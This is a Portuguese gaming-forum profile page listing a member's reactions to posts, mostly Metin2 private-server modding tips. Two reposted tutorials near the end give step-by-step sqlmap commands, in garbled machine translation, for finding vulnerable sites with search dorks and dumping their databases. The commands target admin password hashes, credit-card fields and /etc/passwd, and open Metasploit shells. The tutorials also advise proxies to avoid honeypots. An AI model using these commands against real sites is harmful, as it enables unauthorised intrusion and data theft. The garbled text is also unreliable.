antiblock
https://i.imgur.com/aJ17bf7.gif

βŁά©Ќ§†ŏ®ε™

Membro
  • Content Count

    924
  • Joined

  • Last visited

  • Days Won

    4

Reputation Activity

  1. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted in Logo   
    Esqueceste-te disto colega.
    abraço.
  2. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted to iмαłucø in Logo   
    Assim? '-'
  3. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted in Logo   
  4. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from Shad0w in [Duvida]Coisas De Clientes   
    Eu a pouco tempo andava ai a procura de um programa que fosse capaz de facilitar o meu trabalho em relação a imagens de metin2.
    Tão procurei e encontrei o MysticThumbs323
    O que é que ele faz exatamente ?
    Ele tem todas as extensões de imagens ex: jpg , png, tga
    e ele faz o seguinte , sem precisar de abrir a imagem ele mostra a imagem , o que me facilita muito

    Assim já sei o que tem nos ficheiros e que imagens tem , facilitando-me edita-las e até mesmo substituir os ficheiros.
    O resto tb terás de substituir pelos ficheiros já existentes no cliente, so não substituis se quiseres adicionar cenas novas!
    Em relação dúvida 5 podes comprovar com esta imagem .
    Localização : Locale - ui - loading
    Comprimentos , BlackStore !
  5. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from Ganja Boy in Problema Com Armaduras Beta Ymir   
    O problema que te está a causar isso vem dos msm´s
    Vai ao root - procura por warrior w.msm
    e verifica as linhas da armadura em questão , ver se tens tudo direito...
  6. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from noah.attila in Item_Proto   
    Olá , Tenta usar este programa , até agora nunca tive problema com ele...

    http://www.youtube.com/watch?v=CrHkJQ3vZrg
     
    Tens ai um video que te pode ajudar , Link de download tá na descrição!
  7. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from balegas6 in Um Site Para O Meu Servidor   
    O unico que vejo na Area de sites com +/- o que pedes é o do PureMt2
    e Até ja vem com muito + coisas!
  8. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted to DamageLife in Website Sem Conexão Ao Mysql   
    Contradizes-te ...
    Podes por o site num alojamento web e por as funções php alojadas no teu computador e criar uma ligação....
    Exemplo:
    Host Free
    -index.html
    Seu Computador
    -config.php 
  9. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from Shad0w in Adicionar armas / armaduras / itens na files e cliente metin2   
    Tens aqui um tutorial que te pode ajudar em relação a implementação de armas!
    Espero que te ajude

    http://www.youtube.com/watch?v=8TUz-uhDGkk
  10. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from balegas6 in Um Site Para O Meu Servidor   
    O unico que vejo na Area de sites com +/- o que pedes é o do PureMt2
    e Até ja vem com muito + coisas!
  11. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from Shad0w in Adicionar armas / armaduras / itens na files e cliente metin2   
    Tens aqui um tutorial que te pode ajudar em relação a implementação de armas!
    Espero que te ajude

    http://www.youtube.com/watch?v=8TUz-uhDGkk
  12. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from Shad0w in Armadura M2M   
    Novo link Disponivel: http://cyber-gamers.org/index.php?/topic/21024-mega-releasetodas-as-armaduras-do-m2m/
     
    Espero ter ajudado!
  13. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from Ganja Boy in Problemas Com O Item .epk E Eix   
    Compactador que usas?
    Tenta com o EterNexus-1.0.0.0.2a
  14. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from Ganja Boy in Erro Ao Add Armas E Armaduras Do Beta No Client   
    O que problema é simples , quando se adiciona algo na pasta pack do cliente
    Temos que adicionar no INDEX do cliente, Tenho acerteza que não o fizes-te dai ele não conseguir
    ir buscar as texturas etc.. 
    Muito simples se por exemplo o arquivo !
    armasnovas.eix & armasnovas.epk
    Vais ao index ( Localização no pack do cliente )
    E adicionas lá 
    *
    armasnovas
    *
    è importante que fique como eu pus aqui, Apenas Adicionas & guardas prontos...
    Qualquer dúvida , contacta-me!
  15. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted to RulleZ in [Tutorial] Erro Ao Apagar Personagem !   
    Olá a todos.
    Resolvi fazer um tutorial para as pessoas que têm dificuldades no seu servidor com o sistema de apagar personagens.
     
    Primeiramente vão ao navicat e apagam a tabela player_deletedDepois vão à parte das querys e executam esta query :CREATE TABLE player_deleted SELECT * FROM player LIMIT 0;Só fazer reboot e está funcionavel a opção do apagar personagem.
  16. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from Niceevers in Não Consigo Apagar Personagem   
    Verificas-te se a conta tem códico de apagar personagem?
    Verifica no navicat , Se tem faz o seguinte
    Esvazia a conta toda , mete ela nivel 1 e tenta apagar a ver se dá...
  17. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted to мστσкσ ☯ in Como Mudar Nome Launcher Sura Cliente Overgame   
    Boas Pessoal.
    Não sei se já existia este tutorial, mas vim aqui posta-lo.
    Vou deixar tutorial descritivo e tutorial em vídeo.
     
    -Como alterar o nome do Launcher do Rancoroso:
     
    http://prntscr.com/54esxu
     
    Vamos lá ao tutorial.
     
    1º Passo:
     
    -Baixar os 2 ficheiros que irei disponibilizar no final do tutorial.
     
    2º Passo:
     
    -Abrir o HxD e ir a File > Open  e colocar o ficheiro Overgame
     
    http://prntscr.com/54et47
     
    3º Passo:
     
    - Clicar CTRL + F e colocar igual à imagem
     
    http://prntscr.com/54etcv
     
    4º Passo:
     
    -Depois dão OK e clicam com o rato aqui:
     
    http://prntscr.com/54etsd
     
    5º Passo:
     
    -Escreverem o que quiserem . (Atenção! Não pode chegar à letra ô) Exemplo:
     
    http://prntscr.com/54eu4p
     
    6º Passo
     
    -Fechar e Guardar 
     
    7º Passo
     
    -Irá ser criado o seguinte ficheiro "MT2Overgame.exe.bak"
     
    http://prntscr.com/54euc4
     
    8º Passo
     
    -Como vão ver, foi mudado o nome:
     
    http://prntscr.com/54euje
     
    9º Passo
     
    -Ao abrirem o Launcher vai criar um decumento txt dizendo : "servidor" que é onde vão por o IP
     
    10º Passo
     
    -Depois copiam os 3 ficheiros e colam no cliente !
     
    http://prntscr.com/54eupi
     
    Tutorial em Vídeo:
     

     
    -----------------------------------------
     
    Download do MT2Overgame: http://www.4shared.com/rar/E66nNUTU/MT2Overgame
     
    Download do HxD:  http://www.baixaki.com.br/download/hex-workshop.htm
     
    ---------------------------------------------
    O vídeo foi feito à algum tempo, pelo meu antigo canal [Gibellini Gi , mas o nome alterou para Francisco Torres (hà mt tempo)]
     
    Não te esqueças de dar   
     
    Cumprimentos,
  18. Upvote
    βŁά©Ќ§†ŏ®ε™ got a reaction from redgun1997 in Erro Do Autopatch   
    A solução ta ai mesmo , " O launcher tem que estar na pasta do cliente "
    O teu antivirus eliminou o .bin
    Vais ao antivirus desativas ele ou então adicionar o bin as exclusões para ele não te eliminar!
    se por acaso desativares ele terás que ir a Quarentena e restaurar o ficheiro..
  19. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted to iмαłucø in Pedido De Uma Sign !   
    Tópico Fechado.
    Motivo:Pedido Realizado.
  20. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted to thecrazy in Pedido De Uma Sign !   
    Oi, só para avisar que já comecei o teu pedido , mas só irei entregar na sexta feira ou durante o fim de semana (:
  21. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted to thecrazy in Pedido De Uma Sign !   
  22. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted to SpierNumad in Sqlmap Injecção Com Amostras   
    . 1 Comando opção - uDeixe ' s dizer , temos meta algo como :http : //www.domain.com/article.php?id=7Injeção de comandos :$ ./ sqlmap . py - u ""https://123.123.123.123:3128" -- dbs . 6 Comando opção - dbmsSuponha que nós ' re certeza de que o site de destino usa o tipo de banco de dados MySQL . Nós podemos definir isso em o comando com opções - dbms = mysql , de modo que será mais rápido no ataque de injeção , ao invés de girar através de todos os tipos de banco de dados , como A Oracle , MSSQL , etc .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- forms -- dbms = mysql -- dbs . 7 Comando opção - D , - T , - C- D : despejo de banco de dados- T : depósito de mesa- C : despejo colunaDeixe ' s dizer que temos o nome do banco de dados como : sitedb .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T Esse comando acima irá enumarate tudo tabelas nome de determinado banco de dados que é " sitedb ".Deixe ' s dizer que temos 15 mesas de nome , um deles é : administrador . E nós queremos enumerar para seu nome colunas .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C Esse comando acima irá enumarate todas as colunas nome de determinado banco de dados que é " sitedb " e mesa " administrador ".Deixe ' s dizer que temos 6 colunas nome , por exemplo : id , admin_id , admin_pass , admin_fullname , admin_mail , admin_level .Nós queremos despejar todos os dados na tabela " administrador ".Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - despejo Ou se você quiser despejar apenas determinadas colunas , como " admin_id " e " admin_pass ".Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C admin_id , admin_pass - despejo . 8 Comando opção - respostasEsta opção é útil vry se você quer executar o processo de ataque 100 % automaticamente, sem qualquer intervenção do utilizador .Por exemplo , quando você está descarregando os dados de determinada tabela ( veja a opção de comando 6 acima ), SqlMap irá automaticamente tentar rachar qualquer cadeia que tem formato como " hash de senha ".Por exemplo :Em despejo da mesa " administrador ", você tem 3 linhas de registro , essas são :Admin : 0cc175b9c0f1b6a831c399e269772661gerente : 92eb5ffee6ae2fec3ad71c777531578fstaf : 4a8a08f09d37b73795649038408b5f33Desde que encontrou dados de campo como " 0cc175b9c0f1b6a831c399e269772661 ? que tem como formato MD5 - haxixe , SqlMap vai tentar a quebrá-la automaticamente usando lista de palavras em dir " txt ". Cracking 3 hashes com poucos lista de palavras , levaria um curto tempo . Mas o que se o hashes encontrados são cerca de 10 , 000 registros e a contagem de lista de palavras é mais do que 100 , 000 , 000 linhas ?? Wouldn ' t demorar muito tempo tempo de espera .A melhor idéia é despejar todos os dados em primeiro lugar , em seguida, o processo de craqueamento pode ser feito mais tarde separadamente . Para este propósito , podemos usar opção de comando - respostas , para fazer SqlMap pular " rachar " processo .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C admin_id , administrador - passar - despejo - respostas = "rachar = N" - resposta = " rachar = N ", tomamos certa especial única seqüência de rachar a questão , que é " de crack ", e que defina -o para " N " = Não .9. Command opção - rubor - sessãoInjeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dbs -- flush - session Esse comando acima irá fazer SqlMap para lavar todas as sessões encontrados a partir de injeção anterior direcionados a determinado site . Isso é muito útil quando você fazer a injeção com T ( Tempo ) de ataque baseado , como às vezes há ' sa ficando para conexão com o site de destino .Mas , tenha cuidado usando - rubor - sessão , como ele irá apagar todas as sessões de injeção e arquivo para esse destino . Esta opção significa que o próximo processo de injeção começará a partir de zero , como se nós nunca injetar o alvo antes .. 10 Comando opção - hex$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C admin_id , administrador - passar - despejo - hex - tecnologia = T Usando - opção hexadecimal é muito útil quando o processo de injeção usa T ( Tempo ) com base . Meios que os dados que estão sendo recuperados são convertidos em HEX ( hexadecimais ) dígitos antes de começar a entregar . Isso também para evitar quaisquer caracteres estranhos que estão sendo recuperados .11. Comando opção - não - elenco" cast " função no MySQL significa , para converter uma seqüência de caracteres para um personagem diferente conjunto .Por exemplo :SELECT CAST ( _latin1 'teste' AS CHAR CHARACTER SET utf8 );Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dbs -- no - cast Observe que , nós podemos ' t junção entre - não - elenco e - opção hex . Nós temos que escolher um deles em um comando .12. Comando opção - despejo - todosPara despejar todos os bancos de dados encontrados , mas exclui " information_schema " DB ou excluir DBMS banco de dados do sistema .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dump - all -- exclude - sysdbs . 13 Comando opção - contagemInjeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - contagem Para contar registros / linhas em uma determinada tabela . Muito útil se você quiser verificar quantos registros / linhas em uma tabela antes de despejá-lo .. 14 Comando opção - início , - finalDeixe ' s dizer que encontramos mesa " membro " e há cerca de 24 , 000 registros em que . E nós queremos despejar início do registro " 1000 ? a " 2000 ?.Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - membro T - despejo - respostas = "rachar = N" - começar = 1000 - final = 2000 . 15 Comando opção - pesquisaDeixe ' s dizer que existem cerca de 90 tabelas em um determinado banco de dados , e queremos curta nosso tempo olhando para a tabela contém certas " nome do campo ". Por exemplo : credit_card_type .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - busca = "credit_card_type" Ele irá procurar através das tabelas inteiras na base de dados " sitedb " e encontrar em nome do campo " credit_card_type ".. 16 Comando opção - atrasoEsta opção - demora algum tempo usado com T ( Tempo ) Tipo de ataque baseado , para evitar atraso conexão de / para o alvo e para obter dados com precisão .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- batch -- dbs -- delay = 5 -- tech = T Observe , quando nós usar - atraso na Hora tipo de ataque baseado , não é nenhuma " linha " que está sendo definido . Tópico é apenas um , por padrão .- atraso = 5 , significa atraso entre um ataque ao próximo ataque é 5 segundos .17. Comando opção - comuns - mesas , - comuns - colunasSuponha que temos o nome do banco de dados " sitedb ", o tipo de banco de dados é MySQL versão 4.0 . Como sabemos que o MySQL versão 4 doesn ' t tem " information_schema " banco de dados do sistema , por isso vai ser difícil de enumerar as tabelas / colunas nome . Nós vamos utilização " fuzzing / bruteforcing " técnica para obter a tabela e nome da coluna .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - comum - tabelas Esse comando acima irá tentar a Bruteforce para o nome da tabela com base na lista de nomes de tabelas .Deixe ' s dizer que encontrei uma mesa , por exemplo : membro . Mas nós don ' t tem alguma idéia do que o nome da coluna é . Em seguida , vamos bruteforce para o nome da coluna .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - comum - colunas Esse comando acima irá tentar a Bruteforce para o nome da coluna com base na lista de nomes de colunas .18. Comando opção - sql - shellPara pedir por um comando interativo shell SQL .$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- sql - shell Ele vai mostrar um comando interativo shell SQL .Por exemplo , nós queremos fazer consulta SQL da tabela " administrador ".> selecione contagem (*) do administrador ;Você também pode usar - sql - consulta diretamente a partir do comando de injeção , por exemplo :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- sql - query = "select count (*) from admin " 19. Comando opção - MSF - caminhoPara solicitar uma concha que se refere a MSF ( Metasploit ) Framework . Instale MSF primeiro antes de usar esta opção de comando .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- msf - path = "the_MSF_path_where_it_is_installed" 20. Comando opção - arquivo - leiaPara ler qualquer ( legível ) do arquivo no servidor .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- file - read = "/etc/passwd" . 21 Comando opção - adulteraçãoPara usar adulteração para o ataque de injeção . Por exemplo , nós queremos dar o ataque de injeção com corda "+" para qualquer caractere de espaço em que . Significa que irá converter todos os espaços com seqüência de "+".Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dbs -- tamper adulterar / space2plus . py Para breve o comando de ligação de sabotagem , você pode configurar link de atalho para todos os scripts de adulteração no dir " adulterar ".$ Ln - s adulteração / space2plus . py space2plus . pyFaça o mesmo para outros scripts de adulteração que você quer fazer atalho para ele .. 22 Comando de opção - usuários , - senhas , - papéis , - privilégios , - é - dba- usuários : para enumerar todos os usuários do banco de dados- senhas : para enumerar todos os paswords de banco de dados para cada um dos usuários- funções : para enumerar todas as funções de cada um dos utilizadores- privilégios : para enumerar todos os privilégios para cada um dos usuários- É - dba : para verificar se o usuário do banco de dados atual é um banco de dados Administrador ou nãoInjeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- users -- passwords -- roles -- privileges -- is - dba Útil se você deseja verificar se o usuário do banco de dados atual é um DB Administrador ou não , ou para verificar o usuário tem " escrever " privilégio ou não . Se o usuário tem " escrever " privilégio , então poderíamos tem chance de escrever arquivo no servidor . Ele ' s apenas como " mysql_into_outfile " comando .Boa sorte com a sua injecção .Nota :- Se você faz a injeção com SqlMap de VPS ( Virtual Privada Servidor ) e resultados processo do Google , ter cuidado .. às vezes você don ' t perceber que o local de destino que você ' re atacou é um " honeypot ". Ele ' sa armadilha geralmente definida por empresa de segurança ou empresa de monitoramento de internet . Uma vez que você ' re preso em servidor honeypot , ele irá gravar toda a sua injeção / hackear atividades e seu IP . Então , a autoridade empresa vai apresentar para o relatório legal para sua empresa de hospedagem , e você vai ficar de alerta de los muito em breve . Você ' tem sorte se você só ficar alerta , mas se você fazer isso muitas vezes , empresa de hospedagem pode bloquear / suspender o serviço de VPS por causa de atividades ilegais . Então , basta ter cuidado com o alvo que você ' re tentando truque , você pode usar IP proxy para cobrir o seu IP real .
    creditos kira
  23. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted to SpierNumad in Sqli Com Sqlmap   
    Bem como há centenas de milhares de tutoriais sobre este assunto eu vou ser rápido e claro. Não sou especialista nisso! 1.- Identificar site vulnerável.Vamos apresentar o último valor da URL " Encontramos algo parecido com isto. Neste caso, o "idiota" seria












    inurl : "products.php cat =?"
    inurl : "cat ="
    Você pode jogar com esses valores. 2.- componentes necessários para usar SqlMap site oficial SqlMap




    http : //sqlmap.org/
    Site oficial Python - Eu uso a versão 2.7.5
    http : //www.python.org/
    Instruções

    a) Instale o Python 
    b) Extrair e copiar o conteúdo da página SqlMap pacote de download, renomeie a pasta com um nome como "SqlMap" mais fácil porque quando descompactar o nome da pasta é longa em C:  
    c) Agora, com o console de comando do Windows (CMD) estamos localizados na pasta sqlm localizado em C: 3.- Agora vamos explorar a vulnerabilidade que temos encontrado.






    - u URL , - url = URL de destino URL ( e . g . "www.target.com/vuln.php?id=1" )
    - tópicos = LINHAS Max número de HTTP concorrente ( s ) pedidos ( default 1 )
    - dbs enumerar bancos de dados DBMS






    - mesas Enumerar DBMS tabelas de banco de dados
    - banco de dados D DB DBMS para enumerar




    - colunas Enumerar DBMS colunas da tabela do banco de dados
    - banco de dados tabela T TBL DBMS para enumerar
    - banco de dados D DB DBMS para enumerar




    - banco de dados tabela T TBL DBMS para enumerar
    - banco de dados D DB DBMS para enumerar
    - C COL DBMS coluna da tabela do banco de dados para enumerar
    26 membros com e-mail e senha, algumas páginas da web salva a senha em texto simples, outra criptografada com MD5 SHA1 algoritmos etc.Finalmente é criada uma pasta onde você pode acessar as informações que extrair c: SqlMap output nome do site despejar SqlMap completa ajudar









    https : //github.com/sqlmapproject/sqlmap/wiki/Usage

    Como eu sabia que todos os aspectos da injeção Tenho rápido e direto, às vezes não é tão fácil, mas não impossível. Você também pode usar ferramentas como Acunetix a varredura de um site à procura de uma vulnerabilidade que pode ser explorada, ou você pode usar dorks de pesquisa através de google ou com ferramentas como o "Exploit Scanner SQLI" Este tutorial também está disponível em espanhol Dúvidas, sugestões e correções por favor, comente 
     
    creditos ziro
  24. Upvote
  25. Upvote
    βŁά©Ќ§†ŏ®ε™ reacted to ☆♕ CabrinhaSexy ♕☆ in Apresentação Vision2   
    Vou ficar com ciumes :o
     
    Eu ando aqui a 3 semanas para receber 2 , "+1" para chegar aos 100 :c
     
    Bem vindo xD